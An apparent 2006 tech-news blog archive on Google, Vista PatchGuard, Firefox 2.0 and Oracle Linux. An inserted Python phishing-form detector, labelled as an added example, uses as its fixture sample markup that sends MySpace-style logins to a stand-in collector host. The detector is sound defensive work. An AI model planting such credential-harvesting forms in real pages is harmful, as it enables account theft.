- Google accused of CIA ties
- Google to MS: Let users choose
- Sony's woes continue with PS3 delay
- FCC 811 mandate: Pandora's box?
- AJAX vendor joins Eclipse
- Politicians just don't get IT
- More chairs fly over PatchGuard
- MySpace used in phishing attack
- Report: News Corp. eyeing Digg
- Oracle-Ubuntu rumor fizzles
October 31, 2006 | Comments: (0)
Google accused of CIA ties
Robert David Steele, a former clandestine services case officer for the CIA, has accused search behemoth Google of being in bed with the intelligence agency and government departments. Steele aired these views on Alex Jones's nationally syndicated radio show, according to reports.
"I think that Google has made a very important strategic mistake in dealing with the secret elements of the U.S. government -- that is a huge mistake and I'm hoping they'll work their way out of it and basically cut that relationship off," Steele said, claiming to have confirmed his allegation with his ties in the CIA.
He also said that "Google was a little hypocritical when they were refusing to honor a Department of Justice request for information because they were heavily in bed with the Central Intelligence Agency, the office of research and development."
An MP3 recording of the Steele interview is available to Prison Planet.tv subscribers.
In addition to working for the CIA, Steele served for twenty years as a Marine Corps infantry and intelligence officer and was the second-ranking civilian in U.S. Marine Corps Intelligence from 1988 to 1992. He's also the founder and CEO of OSS.Net, an organization committed to furthering international understanding of the importance of open source intelligence.
This isn't the first time Steele, or anyone else for that matter, has suggested ties between Google and the government. A Web site called HSToday.us reported in January:
"Google's alleged secret relationship with the U.S. intelligence community (IC) was divulged by an IT contractor and confirmed by U.S. intelligence authorities familiar with the matter during the OSS.Net IOP conference near Washington, DC. The contractor, who spoke on a not-for-attribution basis, said that at least one U.S. intelligence agency he declined to identify is working to 'leverage Google's [user] data monitoring' capability as part of an effort by the IC to glean from this data information of 'national security intelligence interest' in the war on terror."
Of course, none of these allegations have yet been proven, and the fact that the aforementioned report came from an unnamed source at a conference sponsored by Steele's own company adds a few grains of salt to the story.
Still, given the power Google wields with its data-mining abilities, it's interesting -- and perhaps unsettling -- to contemplate the implications of ties with intelligence organizations.
What do you think? Is this simply baseless fodder for conspiracy theorists, or something that warrants deeper investigation?
Posted by Ted Samson on October 31, 2006 02:29 PM
October 30, 2006 | Comments: (0)
Google to MS: Let users choose
McAfee and Symantec aren't the only companies asking Microsoft to play fair with its forthcoming Vista OS. Searchasaurus Google today urged Big Red to ensure that with its future products, users can easily choose among search tools and apps.
This request was made in Belgium by David C. Drummond, senior vice president of corporate development at Google, according to reports, after a meeting with antitrust regulators for the European Union. "It's been our view that any new version of Microsoft products that include search, that that be done in a way that preserves user choice for search and other applications," Drummond said, according to the Associated Press.
Microsoft, which has been hankering for a piece of the profitable search market, has been pushing its Live search engine.
The EU expressed competition concerns to Microsoft in a letter last March, citing the company's "plans to bundle in an Internet search function, a digital rights management program and software for creating fixed document format comparable to PDF, and security features," the IDG News Service reported.
"We are concerned about the possibility that Vista will include software elements which are available separately -- either sold by Microsoft or by other software companies," commission spokesman Jonathan Todd said then.
Todd added last March, "There is also the possibility that we won't have all the technical information needed for competitors to make their software interoperable with Vista."
The latter sentiment was rather prophetic, as McAfee and Symantec, along with other security ISVs, have cried foul that Microsoft hasn't given them what they need to ensure their security wares run correctly on Vista.
Microsoft continues to deny any wrongdoing.
As for Google, the company spokesman said that it's too early to tell whether it has cause yet to make antitrust allegations.
Posted by Ted Samson on October 30, 2006 05:16 PM
October 30, 2006 | Comments: (0)
Sony's woes continue with PS3 delay
Poor Sony. Last week, it detailed the problems behind the millions of defective, prone-to-combustion laptop batteries it's recalled, which is costing the company $429 million.
Now today, according to reports, it's going to be shipping 20,000 fewer PlayStation 3 video-game units than it had originally announced, due to a delay in part production.
That delay won't affect shipments in the U.S., which is slated to get 400,000, as opposed to the 80,000 units now scheduled to drop in Japan.
Notably, the company is already planning to sell the units at a loss, with the 20GB model priced at $430. That's not an uncommon practice for game-system vendors, though, who make up the loss through software and licensing sales.
Sony is currently running at a 94% profit loss this quarter, due to the battery recalls and troubles in its gaming division.
By the way, if you think discussing video-game consoles is too end-user-y for an enterprise IT blog, well, you may be right.
But then again, have you seen the specs on the high-end system? In addition to having a Blu-ray optical drive and built-in 802.11 b/g Wi-Fi, it will be the first commercial device powered by the Cell processor, a 3.2GHz chip that Sony developed with assistance from IBM and Toshiba. Boasting seven SPEs, the chip is said to perform at 218 gigaflops. Maybe there'll be a place for one in your server room?
Posted by Ted Samson on October 30, 2006 02:35 PM
October 30, 2006 | Comments: (0)
FCC 811 mandate: Pandora's box?
Pursuant to the Pipeline Safety Act of 2002, the FCC has mandated that all telecommunications network carriers make 811 available by March 2007 as a free dial-in phone number for digging-site information.
Some states and cities already have their own service, but this will be the first time it goes national. Vonage will be the first provider to offer 811 as a national service.
In case you've never heard of this before, here's how it works: If you are adding an addition to your home, installing a pool or just digging a ditch in your backyard, you dial 811 and that connects you to what is called a local one-call center.
The center in turn connects to the local utility company in the area and lays out the location of pipes and/or cables underground.
It is nice to know that my neighbor won't be cutting any power lines that turn off my air-conditioning in August or, worse still, hitting a gas pipeline.
But, what if my neighbor is a local terrorist? Then what? You never know what he might do with that info. In fact, he never says good morning to me, shouldn't that tell me something?
Now he is armed with information some governments actually try to keep secret.
It is a crazy world we live in, and having to worry about these things just makes it crazier still.
Posted by Ephraim Schwartz on October 30, 2006 01:16 PM
October 30, 2006 | Comments: (0)
AJAX vendor joins Eclipse
AJAX (Asynchronous JavaScript and XML) tools vendor Helmi Technologies has joined the Eclipse Foundation as an Add-In Provider member.
Maker of the Open Source RIA Platform, Helmi is making its technology and source code available to the Eclipse community.
"We are excited to be joining the Eclipse Foundation," said Jorden Woods, CEO of Helmi Technologies in the U.S., in a statement released by the company. "Our goal when developing our open source product was to allow companies to leverage their development team's knowledge base and shorten the learning curve to maximize productivity. We share the same vision as the Eclipse Foundation, which is to enable developers to easily create derivative works from our platform in an open source environment."
The Helmi platform, positioned for Web 2.0 deployments, is available for download here.
Add-In Provider members are companies that view Eclipse as an important part of their corporate and product strategy, Eclipse said. These members want to participate in the development of the Eclipse ecosystem.
Posted by Paul Krill on October 30, 2006 12:29 PM
October 27, 2006 | Comments: (0)
Politicians just don't get IT
Earlier this week, the president of the United States (George W. Bush) sat down with a reporter from CNBC for a friendly interview. During the chat, the reporter asked him about his Internet usage. "Have you ever Googled anybody? Do you ever use Google?" she wanted to know.
The president replied that he does use "the Google" (his words) on occasion to "pull up maps" -- "I forgot the name of the program, but you get the satellite ..." -- for viewing his ranch.
This exchange has prompted chuckles among techies and non- across the Internets -- another famous reference by Bush from 2004. (More troubling to me in that CNBC interview is Bush's admission that he will not use e-mail: "I don't e-mail, because of the different record requests that can happen to a president.")
But Bush isn't the only elected leader out there who has demonstrated a poor grasp of fairly basic technology -- and worse. As such, I think these kinds of gaffes ought to elicit more than dismissive snickers or disgusted eye rolls. They should elicit feelings of concern and some probing questions of both candidates and politicians about how technology fits into their agendas, including how they are going to work to protect our exposed digital borders.
Now, I'm not saying that elected leaders need to be DBAs or certified Linux admins any more than a CEO of a private organization should be. They should, however, have a decent understanding of and interest in topics such as e-commerce and data security, as well as advisers and staffers who are keenly attuned to technological issues. This is, after all, the Internet Age, and the Internet is an essential tool for our economy and security -- which makes the Internet a plausible place for attacks in the U.S.
Examples and reports of political techno-ignorance seem to be on the rise, and I don't think people in the tech community needed to be told that by a former EU commissioner.
The most significant proof, in my mind, is a recent report from the Government Reform Committee which gave the federal government a pathetic D+ for its handling of data security. Seems that since 2003, every single one of the government's 19 departments has suffered at least one data breach, though some have suffered hundreds. If there's been a call for sweeping reform throughout these departments, I've yet to read about it.
Then there were the hearings earlier this year about Net neutrality. The outcome of that debate could have a huge impact on the Internet as we know it, but I can't help but wonder how many of our elected officials really grasp the issue. Consider, for example, the infamous description of the Internet by Sen. Ted Stevens:
"Ten movies streaming across that, that internet, and what happens to your own personal internet? I just the other day got ... an internet was sent by my staff at 10 o'clock in the morning on Friday, I got it yesterday. Why? [...] They want to deliver vast amounts of information over the Internet. And again, the Internet is not something you just dump something on. It's not a big truck. It's a series of tubes. And if you don't understand those tubes can be filled and if they are filled, when you put your message in, it gets in line and it's going to be delayed by anyone that puts into that tube enormous amounts of material, enormous amounts of material."
Consider, also, electronic voting. Experts have cited legitimate security problems with existing e-voting machines for years now. Yet even after over a thousand separate incidents were reported during the 2004 elections, the government's moving at a glacial pace to resolve them.
At least one pundit has even resorted to giving an in-depth explanation of how to steal an election, which, alongside an undoubtedly satirical Web site promising to fix election outcomes, might light a fire under a politician or two to fix the problem.
And just today, Rep. Edward Markey called for the arrest of security researcher Christopher Soghoian, who created a Web site, called Northwest Airlines Boarding Pass Generator, on which users could print up a forged boarding pass for Northwest Airlines flights. That, to me, is yet again indicative of a politician who is missing entirely the big technology picture of airline security. (There's also a question there about freedom of speech, but this entry is more about politicians' knowledge of technology, not Constitutional law.)
Anyway, election day is drawing near, so if you haven't voted yet and you're as concerned as I am about keeping technologically ignorant politicians out of office, I suggest you do a little more homework on your candidate of choice.
Perhaps even send him or her an e-mail -- though if you do, you run the risk of not getting a response. Because, you know, not all politicians read their e-mail.
Posted by Ted Samson on October 27, 2006 05:26 PM
October 27, 2006 | Comments: (0)
More chairs fly over PatchGuard
TechWatch blogged about the three-ring circus called "Vista PatchGuard" that popped up in the middle of the once staid security market in recent months. As I'm sure you know, vendors like Symantec and McAfee are none too happy about Microsoft's kernel protection technology for 64-bit Windows Vista systems, claiming that it will prevent them from taking the steps necessary to detect and protect users from threats like rootkits. Microsoft has always said that it will work with third-party vendors to extend the Vista kernel and enable alternative types of protections through APIs and other fixes, providing that PatchGuard remains in place. But with Gartner estimating that those kinds of extensions will take years to complete, security vendors aren't anxious to wait around while Microsoft polishes its security lineup.
This week saw security vendor and Microsoft partner Authentium jump ship, announcing on Wednesday that a new technology the company will announce next month, VirtualATM, will allow them to circumvent PatchGuard and "hook" the Vista Kernel so that they can secure online banking transactions from Trojans, keyloggers and other types of malware.
The company toned down its language yesterday, with a new post that claims VirtualATM just adds a "complimentary" layer of security to PatchGuard, but doesn't subvert it. Authentium implores Microsoft not to "go it alone."
According to published reports, Microsoft plans to patch PatchGuard to prevent the VirtualATM hack, just as it patched Vista to prevent the "Blue Pill" hypervisor hack demonstrated by Joanna Rutkowska at the Black Hat briefings conference. But with two PatchGuard patches out before Vista even hits the street, and hackers estimating that PatchGuard hacks will be available within months or a year of Vista's public release, the whole argument for the technology -- that it would make the kernel off limits to malicious code -- seems to be turning into so much sand.
With blood in the water, even small fry are taking their licks at PatchGuard. Firewall vendor Agnitum is talking smack about PatchGuard today in their blog, and has referred to PatchGuard as Microsoft's Maginot Line. Not that the opinions of Agnitum count for much in the hallways of Redmond, but the allusion to France's ill-fated series of static fortresses along the border with Germany that Hitler's army easily circumvented in its invasion of the country. More than one security researcher has already admitted that, whatever its benefits, PatchGuard won't be hack-proof. Monumental security "fixes" like PatchGuard and the Maginot Line only work for as long as it takes for some smart hacker to figure out a way around them, at which point they become a monument to fighting yesterday's battles.
Posted by Paul Roberts on October 27, 2006 01:10 PM
October 27, 2006 | Comments: (0)
MySpace used in phishing attack
A report from Netcraft today points to a phishing Web site that is being hosted on MySpace.com. The page, which is still active, asks users to provide their MySpace username and password to access premium content. Hitting Login, however, sends your credentials to a server hosted in Ireland that Netcraft has identified as being involved in phishing attacks.
The attack is notable because it does not use suspect techniques like cross-site scripting to fool users. Instead, plain old HTML is used to bury the MySpace.com content on the page and provide the simple login screen for users. That means that automated tools that MySpace uses to look for malicious content may not clue into the ruse.
While MySpace profiles won't yield credit card numbers and bank accounts, and aren't the treasure troves that, say, online brokerage accounts are, they can be used to spread malicious code or to craft even more sophisticated spear phishing attacks later on.
MySpace has been informed of the attack but apparently hasn't gotten around to taking it down yet. Let's hope they do soon!
Posted by Paul Roberts on October 27, 2006 11:21 AM
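The evasion described in the post above, a plain HTML login form whose credentials go to another host, can be checked for statically on user-supplied pages. The following is an added example, not part of the original post and not MySpace's or Netcraft's tooling; the host names, the sample profile markup and the function names are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed sample: a user profile page on a hypothetical site, social.example.
PAGE_URL = "http://profiles.social.example/user/12345"
TRUSTED = ("social.example",)  # suffixes the site itself controls (assumption)

SAMPLE_PROFILE = """
<html><body>
<form action="/search" method="get"><input type="text" name="q"></form>
<form action="/login" method="post">
  <input type="text" name="user"><input type="password" name="pass">
</form>
<div style="position:absolute; top:0; left:0; width:100%; background:#fff">
  <p>Log in to view premium content</p>
  <form action="http://collector.example/save.php" method="POST">
    <input type="text" name="email"><input type="PASSWORD" name="password">
    <input type="submit" value="Login">
  </form>
  <form action="//social.example.collector.example/l" method="post">
    <input type=password name=p>
  </form>
</div>
</body></html>
"""


class FormCollector(HTMLParser):
    """Record every <form>: its action, method, and whether it has a password field."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)  # attribute names arrive lowercased; values may be None
        if tag == "form":
            self._current = {
                "action": attrs.get("action") or "",
                "method": (attrs.get("method") or "get").lower(),
                "has_password": False,
            }
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (attrs.get("type") or "text").lower() == "password":
                self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def is_trusted(host, trusted_suffixes):
    """True if host equals a trusted suffix or is a subdomain of one."""
    host = (host or "").lower().rstrip(".")
    return any(host == s or host.endswith("." + s) for s in trusted_suffixes)


def offsite_credential_forms(html, page_url, trusted_suffixes):
    """Return password-bearing forms whose resolved action leaves the trusted hosts."""
    collector = FormCollector()
    collector.feed(html)
    collector.close()
    findings = []
    for form in collector.forms:
        if not form["has_password"]:
            continue  # search boxes and similar forms are not credential prompts
        # Resolve relative, empty and scheme-relative actions against the page URL.
        target = urljoin(page_url, form["action"].strip())
        parts = urlsplit(target)
        if parts.scheme not in ("http", "https") or not is_trusted(
            parts.hostname, trusted_suffixes
        ):
            findings.append(
                {"action": target, "host": parts.hostname, "method": form["method"]}
            )
    return findings


if __name__ == "__main__":
    for finding in offsite_credential_forms(SAMPLE_PROFILE, PAGE_URL, TRUSTED):
        print("password form posts off-site:", finding)
```

The check works on markup alone, so it flags the form even though no script is involved, and the suffix match on a dot boundary keeps a look-alike host such as `social.example.collector.example` from passing as trusted.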
October 26, 2006 | Comments: (0)
Report: News Corp. eyeing Digg
News aggregation site Digg.com and News Corp. have been engaged in acquisition negotiations but have yet to reach any agreements, according to Techcrunch.
By acquiring Digg, News Corp. would add another Internet hot-spot to its portfolio, which already includes MySpace. If the acquisition doesn't occur, Digg is poised to pursue a second round of financing, according to the report.
The sticking point, Techcrunch says, is how much Digg is actually worth: The startup is asking for no less than $150 million, which doesn't equal the company's ad revenue, some speculate. (Doesn't hurt to ask, right? YouTube's owners got $1.6 billion from Google for their video-sharing site.)
Digg's value is undoubtedly tied to the number of visitors it gets, and that was one of the looming questions in the negotiations. Digg pegs unique monthly visitors at 20 million and growing. Comscore reports that the site enjoys only 1.3 million monthly unique visitors. Quantcast, currently in beta, calculates the number of U.S. visitors at around 500,000 (if I am reading their chart correctly).
Stay tuned.
Posted by Ted Samson on October 26, 2006 01:00 PM
October 25, 2006 | Comments: (0)
Oracle-Ubuntu rumor fizzles
Rumors of some sort of Linux distribution arrangement between Oracle and Ubuntu have proven to be just that: rumors.
Such an announcement had been widely anticipated at the Oracle OpenWorld conference in San Francisco this week.
"We've never talked to Ubuntu," said Edward Screven, chief corporate architect for Oracle, during a press conference at OpenWorld on Wednesday afternoon. Instead, Oracle announced plans to support Red Hat Linux, cutting onto Red Hat's turf.
But some were seeking even more. At one point during the press conference, one questioner noted the existence of free, open source databases like MySQL and, while beginning to ask when Oracle would offer such a database, was quickly cut off.
"The only thing we're announcing today is support for Linux," Screven said. The company also will not disclose source code for its own products.
"This is something our customers have asked us to do for quite a while," said Bob Wynne, Oracle vice president of corporate communications, of Wednesday's Linux announcement.
Screven said the adoption of Linux in the enterprise has been too slow and that Oracle's move was a natural extension of progress for Linux and the use of Linux on commodity hardware.
Still, Screven acknowledged Oracle's Linux revenue streams have not amounted to much, relatively speaking. "The amount of revenue in the Linux business compared to all our other businesses is small but the strategic importance is large," he said.
Posted by Paul Krill on October 25, 2006 04:29 PM
October 25, 2006 | Comments: (0)
Oracle move a worry for Red Hat
Don't call it Oracle Linux! The database vendor won't be packaging its own distribution of the open source OS, but Oracle CEO Larry Ellison announced at Oracle OpenWorld this afternoon that his company will be offering full support for Linux under a new "Unbreakable Linux" campaign.
Oracle has offered comprehensive support for customers who run Oracle databases on Linux in the past, but the new program is something more. According to Ellison, customers will now be able to receive all their patches, security fixes, and backports for RHEL (Red Hat Enterprise Linux) releases 3 and 4 directly from Oracle. In addition, Oracle will offer its Linux support customers full indemnification from intellectual property lawsuits, like the ones filed by SCO.
Red Hat insists that it maintains a longstanding and successful relationship with Oracle. Remember, though, that although Red Hat does package its own complete distribution of Linux, it doesn't actually sell the OS. Rather, its business model is based on subscription support services. As a result, this new move puts Oracle in direct competition with the Linux vendor -- and, as anyone in the software industry can tell you, Oracle is a formidable competitor.
InfoWorld's resident open source blogger, Matt Asay, was in attendance at the show and has posted screen caps of Ellison's slides, complete with pricing.
It will be interesting to see how this pans out as the shockwaves reverberate across the Linux industry.
Is Red Hat in trouble? Have your say below.
Posted by Neil McAllister on October 25, 2006 03:24 PM
October 24, 2006 | Comments: (0)
Authentium: Vista kernel cracked
updated | Some security ISVs such as McAfee and Symantec have been fighting for Microsoft to give them access to 64-bit Vista's kernel so the OS won't reject their security wares.
Security vendor Authentium is taking a different approach: It's found a way to simply bypass PatchGuard, the mechanism intended to prevent software from accessing the Vista kernel, according to reports.
Authentium's CTO Helmuth Feericks told Reuters last week that his company "had figured out a way to turn off PatchGuard protection, install its own software, and then turn it back on."
That technology has made its way into Authentium's ESP Enterprise Platform, according to PC Magazine. ESP includes virus protection, antispyware, data recovery, personal firewall, parental controls, popup blocker, and transaction security modules.
An Authentium Virus Blog entry written Oct. 20 says the following:
"The promises Microsoft has made about PatchGuard do not solve any problems for us and by the time they deliver will not be of any use to us. This is assuming that if they deliver something to help anybody, it will actually be something useable. It will allow an unfair advantage to Microsoft when competing with the security vendors as they can and will most likely bypass Patchguard for their own products and will not allow their competition to do the same."
(The entry doesn't mention Authentium's claim that it has bypassed PatchGuard, but it does refer to a non-disclosure agreement with Microsoft. Presumably, said NDA has expired, been broken, or else there's more to be revealed.)
If Authentium's claims are to be believed, it's not a good sign for Redmond, which has gone to great lengths to tout Vista's security in the hopes of putting Windows's tainted security record behind it. If the company has managed to tiptoe around PatchGuard so soon, clever hackers should be able to as well.
In fact, according to a recent entry in Symantec's Security Response Weblog by Oliver Friedrichs, director of emerging technologies in Symantec Security Response: "... [H]ackers have already broken PatchGuard and can disable it. This means that hackers can already get malicious code into the Windows Vista kernel; while legitimate security vendors can no longer protect it. This presents a serious new risk for consumers and enterprises worldwide."
Friedrichs goes on to say, "... [I]f hackers can bypass PatchGuard, why don't security vendors? We certainly could, if we chose to; however, Microsoft has firmly stated that any attempt to do so will result in an update to PatchGuard, which will detect these attempts. It would be foolish for Symantec to ship a product out to over 200 million desktops that may result in a BSOD on each desktop, if Microsoft decides to update PatchGuard."
Posted by Ted Samson on October 24, 2006 09:46 PM
October 24, 2006 | Comments: (0)
Mozilla: Party for people, not browser
With parties planned in places from the Maldives to Paris to celebrate the official release of Firefox 2.0, Mozilla community coordinator Asa Dotzler said Tuesday Firefox was more than a browser -- it's a movement.
Dotzler's job is to keep the Fire in Fox stoked, and reaching 2.0 is reason for a global party, he says. Launch parties are scheduled roughly for Oct 27 and located via Google Maps at the firefoxparty.com site.
You might ask, what does a crop circle, space balloon, sidewalk chalk and a NY Times ad have in common? They highlight the long lists of wacky events Firefox fans have organized to celebrate major milestones for the Firefox browser. To celebrate the release of Firefox 2, Firefox fans are being equipped with the tools to plan launch parties around the globe... There are currently over 375 parties playing host to approximately 3300 Firefox fans who will be celebrating the launch of Firefox 2 this week. Enthusiasts as far south as Antarctica and as far north as Norway have registered thus far and the attendee list is still growing. You can check out a map detailing the party locations in real-time at the Web site.
But aren't we talking about a Web browser, after all? How does a browser stir so much interest for people to contribute? Dotzler said as many as 20,000 people signed up to test 2.0, and that Firefox was spreading at nearly 350,000 downloads a day with little traditional advertising.
It doesn't hurt that bigger groups are getting cool swag like T-shirts and messenger bags to celebrate, but the bottom line with the movement: "Everyone wants to be part of a club," Dotzler said.
But this club would not be the place to be if the movement was not producing "something good", he said. "[The Firefox development team] is the most experienced group of browser developers in the world."
And with open source being just that, their hard work is giving life to next-generation browsers such as Flock, which is based on Firefox.
The co-founder and chief strategy officer of the social browser Flock, Geoffrey Arone, said its upcoming 1.0 release was being built on Firefox 2.0 and would be ready in December.
Arone says Firefox 2.0 is just a starting point, and Flock -- aimed at "the Web's evolution from a passive to a fluid, participatory medium" -- is just a "better browser".
While the Firefox team pores over code and nails the development, and has released some solid refinements to the interface, Arone said, Flock pores over what people do on the Web in their browser to make it more about "... the change in Web user behavior and experience from just 'looking' at the Web to 'making' the Web".
He said it's not as if people are not already sharing photos via e-mail and blogging to share thoughts, but Flock will just make it easier and seamless to find and share while browsing. "It's the actual interplay of things," he said.
The latest batch of usability research: University of California students.
And one of the main features for Firefox 3.0, as outlined by Dotzler, is coming to Flock in 1.0 -- searchable history. No more trawling day by day through history to find that URL. Each page is indexed and searchable, much like in Mac OS's Spotlight.
Sounds very promising, and one more benefit of open source for development -- a little variety.
But if it's IE7 vs. Firefox 2.0 for you, take a look at sister publication PC World's in-depth comparison.
Do you welcome the return of the Browser Wars? I do. Talk back to us below.
Posted by Mike Barton on October 24, 2006 03:40 PM
October 24, 2006 | Comments: (0)
OASIS approves SOA reference model
OASIS this week announced its approval of its Reference Model for Service Oriented Architecture (SOA-RM) 1.0 as an OASIS Standard.
SOA-RM provides an abstract framework for understanding the significant entities and relationships within a SOA, OASIS said.
The standard enables development of specific reference or concrete architectures using consistent standards. But SOA-RM is not tied to any specific Web services standards, technologies or other implementation details; it instead offers common semantics for use across and between implementations.
OASIS officials released prepared statements pertaining to the standard.
"The approval of the SOA reference model is a significant step forward in enabling increased SOA interoperability and service re-use within and between organizations that adopt SOA," said William Barnhill, associate at Booz Allen Hamilton and a member of the OASIS Technical Advisory Board.
"There are many different definitions of SOA being used in the marketplace today," said Duane Nickull of Adobe Systems, chair of the OASIS SOA-RM Technical Committee. "By providing a clear, singular point of reference, the SOA-RM enables even those with unique ideas about SOA to describe their work in quantifiable terms that can be commonly understood."
"SOA-RM offers us a much-needed vocabulary for communicating an organization's services architecture. It delivers a standard reference that will remain relevant as a powerful model, useful across SOA deployments with evolving technologies," said Patrick Gannon, president and CEO of OASIS.
Posted by Paul Krill on October 24, 2006 01:49 PM
October 24, 2006 | Comments: (0)
Motorola on Wi-Fi: Stay the course
It seems Motorola didn't much care for my recent blog quoting a Motorola executive on the future of WiMAX and Wi-Fi.
They gave me a call and said I had it all wrong. Being the fair-minded individual that I am I herewith relate some of their comments.
Mind you, Motorola representatives never said I was wrong. I couldn't be wrong because it came from one of their executives and I didn't make it up.
Nevertheless, if President Bush can re-explain what he meant by "stay the course," I guess it is only right that Motorola can re-explain what Juan Santiago said when he told me there is no business case for Metro Wi-Fi, Wi-Fi belongs only in the home and that Wi-Fi and WiMAX don't mix, i.e., they interfere with one another.
If you want to read more on WiMAX and Motorola see today's column.
Tom Hulsebosch, senior director of product management for the Wireless Broadband Network at Motorola, told me that Motorola supports numerous wireless networks including WiMAX, Wi-Fi, and a proprietary "pre-WiMAX" solution called Canopy. "We believe all of these solutions have an integral place in the marketplace," he said, and added,
"Metro Wi-Fi is near and dear to Motorola. We helped create that space."
I'm not sure, is that like Gore saying he invented the Internet?
But I've interviewed Marty Cooper enough times to know that Motorola is actually credited with inventing the cell phone under then employee Cooper.
Motorola is playing a key role in deploying Metro Wi-Fi in at least a dozen cities, delivering the entire access network, not only the access points but the backhaul that feeds the capacity into Motorola's mesh networks, said Hulsebosch.
Cities include Philly, Anaheim, Milpitas, New Orleans, San Francisco.
Hulsebosch refutes Santiago's claim that there is no business case for Metro Wi-Fi and that it must be subsidized in order to succeed.
Rather he says, "in any city with 2,000 homes per square mile the Metro Wi-Fi business case it is very attractive."
Finally, Hulsebosch says Wi-Fi and WiMAX only interfere with one another if they exist in the same chip set as Intel is trying to do.
Rather, if they are two separate radios the problem goes away. But he also added that two radios work fine in a desktop but in a cell phone "it is a little trickier."
So why the disconnect between Santiago and Hulsebosch? Let's chalk it up to enthusiasm.
Does it mean Motorola will at some point abandon Wi-Fi?
I think they believe WiMAX will replace Wi-Fi at some future point. Santiago just let the cat out of the bag a little too soon.
Posted by Ephraim Schwartz on October 24, 2006 11:08 AM
October 23, 2006 | Comments: (0)
Firefox 2.0 released a day early
updated | Mozilla has now officially released Firefox 2.0 following the company's backdoor release a day early.
Mozilla confirmed to me Tuesday that this post's original link (above) was to the actual final version, after saying yesterday: "Mozilla does not guarantee that any set of files currently found within its Web site or elsewhere will be the final release."
The chief concern with pointing directly to the download was that someone hosting the mirror may get stung with excess bandwidth charges, highlighting Mozilla's grassroots methods.
Well, at least no one was stung with malware. With Microsoft's release of IE7 last week, a Trojan-loaded site spoofed the release a day early.
I spoke with Mozilla today about its global launch party, and Flock about its "better browser," and will post on this separately...
You might ask, what does a crop circle, space balloon, sidewalk chalk and a NY Times ad have in common? They highlight the long lists of wacky events Firefox fans have organized to celebrate major milestones for the Firefox browser. To celebrate the release of Firefox 2, Firefox fans are being equipped with the tools to plan launch parties around the globe at www.firefoxparty.com. There are currently over 375 parties playing host to approximately 3300 Firefox fans who will be celebrating the launch of Firefox 2 this week. Enthusiasts as far south as Antarctica and as far north as Norway have registered thus far and the attendee list is still growing. You can check out a map detailing the party locations in real-time at the Web site.
But InfoWorld's Kevin Railsback ferreted out the back-door soft-launch to get the party started.
Not to be mistaken for the usual weight put on a 2.0 such as Web 2.0, this latest version of Firefox adds some handy features, but don't expect anything earth shattering.
The real message here with Firefox 2.0 coming out just days after Microsoft released IE7 is that the browser wars seem back on, which hopefully means some new features will add some genuinely new life to browsers.
A day early? Hopefully Mozilla dotted its Is and crossed its Ts, to avoid the bad news Microsoft got when holes were thought to have been found in IE7 within 24 hours of its release.
Microsoft says the bug is not in the browser but Outlook Express, its e-mail client. Finer points...
Back to the state of browsers: OK, so IE7 now has tabs -- finally. And Firefox has added a nifty new feature that recovers pages and data from the browser following a crash.
A PR guy for the social web browser firm Flock e-mailed to point out how the two leaders are "really about incremental changes to an outdated model." He said browsers had been stagnant for 10 years.
Flock's focus: "The Web's evolution from a passive to a fluid, participatory medium ... [Marking] the change in Web user behavior and experience -- from just 'looking' at the Web to 'making' the Web."
Very true, and little is reflected in IE7 or Firefox 2.0, but I will update after talking through some of this with Mozilla tomorrow, so check back then.
If you have questions for the Mozilla or IE teams, leave them with us below and we'll see if we can get answers or roadmaps. I'll also set up a chat with Flock so they can have their say as to why their browser is it.
Posted by Mike Barton on October 23, 2006 03:48 PM
October 23, 2006 | Comments: (0)
MS bringing Ruby expert aboard
Microsoft has hired John Lam, developer of the RubyCLR, as a member of its .Net Developer Platform Team. He will join the company in January 2007, according to a blog by Microsoft executive S. "Soma" Somasegar.
RubyCLR bridges Ruby and .Net. Lam will be a program manager in the CLR team, focused on implementing dynamic languages on .Net.
"I've decided to stage a friendly takeover of Microsoft. As of January, 2007 my new work address will be Building 42 at Microsoft. I'll be working in the CLR team to help bring the love of dynamic languages out to the statically typed heathens," Lam said in his own blog.
Posted by Paul Krill on October 23, 2006 09:36 AM
October 23, 2006 | Comments: (0)
Antivirus vendors splitting over Vista
We've heard a lot from big name consumer antivirus vendors Symantec and McAfee in recent weeks about their concerns over Microsoft's PatchGuard technology, but less from smaller antivirus firms like ESET, Sophos, Kaspersky Labs, and Trend Micro. Now one of those vendors is coming off the fence and, surprisingly, not coming to the aid of its compatriots.
UK-based Sophos issued a statement early Monday in support of Microsoft's PatchGuard feature, which McAfee and Symantec have both cried foul over.
In an e-mail statement released Monday, Sophos said that its products will offer complete threat protection on 64-bit systems even without the kind of kernel-level access Symantec and McAfee are arguing over.
"Sophos is experiencing no problems with PatchGuard for Sophos's latest HIPS technology. Sophos Anti-Virus and its built-in HIPS will work just fine on both 32- and 64-bit versions of Windows Vista. Microsoft has so far provided all the interfaces that Sophos needs for providing this pre-execution HIPS as well as runtime HIPS," the company said.
Symantec and McAfee may be singing a different tune because "they haven't coded their solutions with 64-bit Vista in mind," said Richard Jacobs, CTO of Sophos.
"We've taken a different approach to HIPS, by focusing more on catching bad behaviour by analyzing code before it executes. Additionally, we are building our technology by making use of supported Microsoft interfaces rather than by trying to subvert the kernel by 'hooking' calls to it. That's why we're ready for 64-bit Vista, and others aren't," Jacobs is quoted as saying.
However, while it's giving Microsoft the benefit of the doubt on PatchGuard, the feature does put the onus on Redmond to make good on promises to work with AV vendors to create kernel interfaces to the Vista kernel that will support new security features.
"It's clearly the case that we and other vendors will now have some dependency on Microsoft to deliver kernel interfaces for new security innovations, which could slow us all down. However this is more than compensated for by the additional security offered by a locked down kernel," Jacobs said.
Microsoft received a similar endorsement last week from security researcher and Blue Pill rootkit author Joanna Rutkowska, who said that PatchGuard was "a very good idea," though she debated whether it could really be considered a security feature, so much as a way to force legitimate vendors to interact with the kernel in an appropriate and predictable way. If PatchGuard couldn't prevent kernel hooking, it would at least make it easier to spot malicious programs that are trying to do it, said Rutkowska.
Of course, Sophos going on record supporting PatchGuard is nothing new. Company executives like Graham Cluley have been quoted extensively in press coverage of the debate saying that they don't share McAfee and Symantec's criticisms of Microsoft, and that they've found Redmond responsive to requests to work on extending the Vista 64 bit kernel to meet their needs.
